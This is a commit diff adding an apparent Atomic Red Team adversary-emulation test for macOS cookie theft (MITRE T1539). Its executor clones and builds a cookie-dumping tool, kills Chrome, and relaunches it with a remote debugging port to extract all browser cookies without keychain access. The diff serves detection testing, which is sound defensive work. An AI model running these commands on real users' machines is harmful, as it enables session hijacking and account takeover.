Add T1539 macOS Chrome Remote Debugging (#2469)

* Add T1539 macOS Chrome Remote Debugging

* Split into 2 prereqs & specify /tmp

---------

Co-authored-by: Jonathan Duan <[email protected]>
Co-authored-by: Hare Sudhan <[email protected]>

atomics/T1539/T1539.yaml

@@ -77,3 +77,40 @@ atomic_tests:
       remove-item #{output_file}
     name: powershell
     elevation_required: false
+- name: Steal Chrome Cookies via Remote Debugging (Mac)
+  description: |-
+    The remote debugging functionality in Chrome can be used by malware for post-exploitation activities to obtain cookies without requiring keychain access. By initiating Chrome with a remote debug port, an attacker can sidestep encryption and employ Chrome's own mechanisms to access cookies.
+
+    If successful, this test will output a list of cookies.
+
+    Note: Chrome processes will be killed during this test.
+  
+    See https://posts.specterops.io/hands-in-the-cookie-jar-dumping-cookies-with-chromiums-remote-debugger-port-34c4f468844e
+  supported_platforms:
+  - macos 
+  dependency_executor_name: bash
+  dependencies:
+  - description: 'Install Go'
+    prereq_command: |-
+      go version
+    get_prereq_command: |-
+      brew install go
+  - description: 'Download and compile WhiteChocolateMacademiaNut'
+    prereq_command: |-
+      /tmp/WhiteChocolateMacademiaNut/chocolate -h
+    get_prereq_command: |-
+      git clone https://github.com/slyd0g/WhiteChocolateMacademiaNut.git /tmp/WhiteChocolateMacademiaNut
+      cd /tmp/WhiteChocolateMacademiaNut
+      go mod init chocolate
+      go mod tidy
+      go build
+  executor:
+    command: |-
+      killall 'Google Chrome'
+      sleep 1
+      open -a "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome" --args --remote-debugging-port=1337 --remote-allow-origins=http://localhost/
+      sleep 1
+      /tmp/WhiteChocolateMacademiaNut/chocolate -d cookies -p 1337
+    cleanup_command: rm -rf /tmp/WhiteChocolateMacademiaNut
+    name: bash
+    elevation_required: false